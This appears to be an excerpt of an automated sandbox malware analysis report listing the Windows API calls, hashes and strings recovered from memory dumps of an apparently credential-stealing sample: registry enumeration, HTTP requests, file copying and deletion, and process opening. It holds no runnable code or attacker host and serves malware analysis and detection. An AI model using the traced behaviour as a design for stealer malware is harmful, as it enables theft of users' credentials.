                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                        • API String ID: 1977917189-1096346117
                        • Opcode ID: 52aad43c17d0cbd30e11a3ec8f47cb803a99a369085b5cf2d06df9b2f190a506
                        • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                        • Opcode Fuzzy Hash: 52aad43c17d0cbd30e11a3ec8f47cb803a99a369085b5cf2d06df9b2f190a506
                        • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                        APIs
                          • Part of subcall function 040A7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 040A75A1
                          • Part of subcall function 040A7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 040A7618
                          • Part of subcall function 040A7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 040A7674
                          • Part of subcall function 040A7537: GetProcessHeap.KERNEL32(00000000,?), ref: 040A76B9
                          • Part of subcall function 040A7537: HeapFree.KERNEL32(00000000), ref: 040A76C0
                        • lstrcat.KERNEL32(0064A668,004217FC), ref: 040A786D
                        • lstrcat.KERNEL32(0064A668,00000000), ref: 040A78AF
                        • lstrcat.KERNEL32(0064A668,00421800), ref: 040A78C1
                        • lstrcat.KERNEL32(0064A668,00000000), ref: 040A78F6
                        • lstrcat.KERNEL32(0064A668,00421804), ref: 040A7907
                        • lstrcat.KERNEL32(0064A668,00000000), ref: 040A793A
                        • lstrcat.KERNEL32(0064A668,00421808), ref: 040A7954
                        • task.LIBCPMTD ref: 040A7962
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                        • String ID:
                        • API String ID: 2677904052-0
                        • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                        • Instruction ID: 5e8a85f221a8fa5c75a95b332eba47c8899c5ad05a5124589d97c5045e68015f
                        • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                        • Instruction Fuzzy Hash: AC317E76A40109EFDB08FBE0DC94DFE777AEB45309B10A018E102772A0DA35F946CB62
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                        • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                        • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                        • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                        • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                        • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                        • InternetCloseHandle.WININET(?), ref: 004050C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                        • String ID:
                        • API String ID: 3894370878-0
                        • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                        • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                        • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                        • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 040A5231
                        • RtlAllocateHeap.NTDLL(00000000), ref: 040A5238
                        • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 040A5251
                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 040A5278
                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 040A52A8
                        • memcpy.MSVCRT(00000000,?,00000001), ref: 040A52F1
                        • InternetCloseHandle.WININET(?), ref: 040A5320
                        • InternetCloseHandle.WININET(?), ref: 040A532D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                        • String ID:
                        • API String ID: 1008454911-0
                        • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                        • Instruction ID: 31060879dc28ef6ec27d56d03e495b37c5c73ac1e3b943aa939aefcfd3d95bbd
                        • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                        • Instruction Fuzzy Hash: 7C31F7B8A40218ABDB20CF94DC85BDCB7B5FB48704F5081D9E609B7280D7746AC58F99
                        APIs
                          • Part of subcall function 040BAA87: lstrlen.KERNEL32(040A516C,?,?,040A516C,00420DDE), ref: 040BAA92
                          • Part of subcall function 040BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 040BAAEC
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                        • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 040B58AB
                        • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 040B5908
                        • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 040B5ABE
                          • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                          • Part of subcall function 040B5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 040B548F
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                          • Part of subcall function 040B5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 040B557F
                          • Part of subcall function 040B5527: lstrlen.KERNEL32(00000000), ref: 040B5596
                          • Part of subcall function 040B5527: StrStrA.SHLWAPI(00000000,00000000), ref: 040B55CB
                          • Part of subcall function 040B5527: lstrlen.KERNEL32(00000000), ref: 040B55EA
                          • Part of subcall function 040B5527: strtok.MSVCRT(00000000,?), ref: 040B5605
                          • Part of subcall function 040B5527: lstrlen.KERNEL32(00000000), ref: 040B5615
                        • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 040B59F2
                        • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 040B5BA7
                        • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 040B5C73
                        • Sleep.KERNEL32(0000EA60), ref: 040B5C82
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleepstrtok
                        • String ID:
                        • API String ID: 3630751533-0
                        • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                        • Instruction ID: 2f314621cda67b337c6695084a39a19932e890f2953e2833ba96f6e604f4cca1
                        • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                        • Instruction Fuzzy Hash: 7DE13171A00204ABEB18FBE0DD95DEE7379AF5520CF408168948676094EF797B08CFDA
                        APIs
                        • memset.MSVCRT ref: 040A158E
                          • Part of subcall function 040A1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 040A151B
                          • Part of subcall function 040A1507: RtlAllocateHeap.NTDLL(00000000), ref: 040A1522
                          • Part of subcall function 040A1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 040A153E
                          • Part of subcall function 040A1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 040A155C
                          • Part of subcall function 040A1507: RegCloseKey.ADVAPI32(?), ref: 040A1566
                        • lstrcat.KERNEL32(?,00000000), ref: 040A15B6
                        • lstrlen.KERNEL32(?), ref: 040A15C3
                        • lstrcat.KERNEL32(?,004262E4), ref: 040A15DE
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                          • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                          • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                          • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                          • Part of subcall function 040B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,040A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 040B8DED
                          • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                          • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 040A16CC
                          • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                          • Part of subcall function 040A9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 040A9C53
                          • Part of subcall function 040A9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 040A9C78
                          • Part of subcall function 040A9C27: LocalAlloc.KERNEL32(00000040,?), ref: 040A9C98
                          • Part of subcall function 040A9C27: ReadFile.KERNEL32(000000FF,?,00000000,040A16F6,00000000), ref: 040A9CC1
                          • Part of subcall function 040A9C27: LocalFree.KERNEL32(040A16F6), ref: 040A9CF7
                          • Part of subcall function 040A9C27: CloseHandle.KERNEL32(000000FF), ref: 040A9D01
                        • DeleteFileA.KERNEL32(00000000), ref: 040A1756
                        • memset.MSVCRT ref: 040A177D
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID:
                        • API String ID: 3885987321-0
                        • Opcode ID: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                        • Instruction ID: d7259859b00212b3a75d41c104c823ec99fd80cac9787f23bc8a99ae053e1133
                        • Opcode Fuzzy Hash: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                        • Instruction Fuzzy Hash: 225163B1A502189BDB15FB60DD91EED737CAF54308F4041A8A64A72081EF347B89CFA9
                        APIs
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                        • wsprintfA.USER32 ref: 00418459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        • RegQueryValueExA.ADVAPI32(00000000,024DCA18,00000000,000F003F,?,00000400), ref: 004184EC
                        • lstrlenA.KERNEL32(?), ref: 00418501
                        • RegQueryValueExA.ADVAPI32(00000000,024DC910,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                        • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                        • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                        • String ID: %s\%s
                        • API String ID: 3896182533-4073750446
                        • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                        • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                        • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                        • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A51
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A68
                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 040A4A7F
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 040A4AA0
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 040A4AB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@$CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1683549937-4251816714
                        • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                        • Instruction ID: afd3b67111c795beef8d20d78c200321665bb365290c42fa179b2b392ae3ba18
                        • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                        • Instruction Fuzzy Hash: 062158B5D00219ABDF10DFA4E848AED7B74FF04324F008229E965BB290EB706A15CF95
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                        • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                        • RegOpenKeyExA.ADVAPI32(80000002,024A9850,00000000,00020119,00000000), ref: 004176DD
                        • RegQueryValueExA.ADVAPI32(00000000,024DC9D0,00000000,00000000,?,000000FF), ref: 004176FE
                        • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3466090806-2517555085
                        • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                        • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                        • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                        • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 040B790B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 040B7912
                        • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 040B7944
                        • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 040B7965
                        • RegCloseKey.ADVAPI32(00000000), ref: 040B796F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                        • Instruction ID: effd7863d1bbf02604f2b498f62f1c3364e80d7716a07cc6e101e4791c592c54
                        • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                        • Instruction Fuzzy Hash: E0014FBDA80204FFEB00DBE0DD49FADB7BDEB48705F005154FA45A7281D674A900CB95
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                        • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                        • RegOpenKeyExA.ADVAPI32(80000002,024A9850,00000000,00020119,004176B9), ref: 0041775B
                        • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                        • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                        • String ID: CurrentBuildNumber
                        • API String ID: 3466090806-1022791448
                        • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                        • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                        • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                        • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                        APIs
                        • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                        • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                        • CloseHandle.KERNEL32(000000FF), ref: 00419327
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSize
                        • String ID: :A$:A
                        • API String ID: 1378416451-1974578005
                        • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                        • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                        • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                        • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 040A75A1
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 040A7618
                        • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 040A7674
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 040A76B9
                        • HeapFree.KERNEL32(00000000), ref: 040A76C0
                          • Part of subcall function 040A94A7: vsprintf_s.MSVCRT ref: 040A94C2
                        • task.LIBCPMTD ref: 040A77BC
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                        • String ID:
                        • API String ID: 700816787-0
                        • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                        • Instruction ID: 08b26f71d29e7f90fb721eaca1df49751853e721d14ad5b4aa001a20a95b5fd7
                        • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                        • Instruction Fuzzy Hash: A761DAB59001689BDB24DB90CC54FEDB7B8BF44308F0085E9E649A6140DBB0ABD5CF95
                        APIs
                          • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                          • Part of subcall function 040A64E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 040A6548
                          • Part of subcall function 040A64E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 040A656A
                          • Part of subcall function 040A64E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 040A659C
                          • Part of subcall function 040A64E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 040A65EC
                          • Part of subcall function 040A64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 040A6626
                          • Part of subcall function 040A64E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 040A6638
                          • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                        • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 040B557F
                        • lstrlen.KERNEL32(00000000), ref: 040B5596
                          • Part of subcall function 040B9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 040B90B9
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 040B55CB
                        • lstrlen.KERNEL32(00000000), ref: 040B55EA
                        • strtok.MSVCRT(00000000,?), ref: 040B5605
                        • lstrlen.KERNEL32(00000000), ref: 040B5615
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                        • String ID:
                        • API String ID: 3532888709-0
                        • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                        • Instruction ID: ce1a30278e309acd82cb0f034ae0b6f31c77163877f1a26caa06769650f3ab39
                        • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                        • Instruction Fuzzy Hash: C6510B70610208ABEB18FFA4DE95EED7775AF1030CF544018E8867A590EB347B45CFA9
                        APIs
                        • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 040B7345
                          • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                        • OpenProcess.KERNEL32(001FFFFF,00000000,040B7574,004205BD), ref: 040B7383
                        • memset.MSVCRT ref: 040B73D1
                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 040B7525
                        Memory Dump Source
                        • Source File: 00000000.00000002.2192376340.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: OpenProcesslstrcpymemset
                        • String ID:
                        • API String ID: 224852652-0
                        • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                        • Instruction ID: 1241c14ee1f31fadc365b6fb90ab5e906a3a8f559e6ad298e695d39bef54af7f
                        • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                        • Instruction Fuzzy Hash: 245161B0D00218DBDB14EB94DC84BEDB7B4AF44309F5085A9D14577181EB747A84CFAD
                        APIs
                        • memset.MSVCRT ref: 004140D5
                        • RegOpenKeyExA.ADVAPI32(80000001,024DD740,00000000,00020119,?), ref: 004140F4
                        • RegQueryValueExA.ADVAPI32(?,024DE050,00000000,00000000,00000000,000000FF), ref: 00414118
                        • RegCloseKey.ADVAPI32(?), ref: 00414122
                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                        • lstrcatA.KERNEL32(?,024DDF90), ref: 0041415B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2190984895.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.2190984895.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190984895.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$CloseOpenQueryValuememset
                        • String ID:
                        • API String ID: 2623679115-0
                        • Opcode ID: fa8b58036ffac9d5281ddaf2101bc218c73992fb998376cc82465a095904cdcb
                        • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                        • Opcode Fuzzy Hash: fa8b58036ffac9d5281ddaf2101bc218c73992fb998376cc82465a095904cdcb
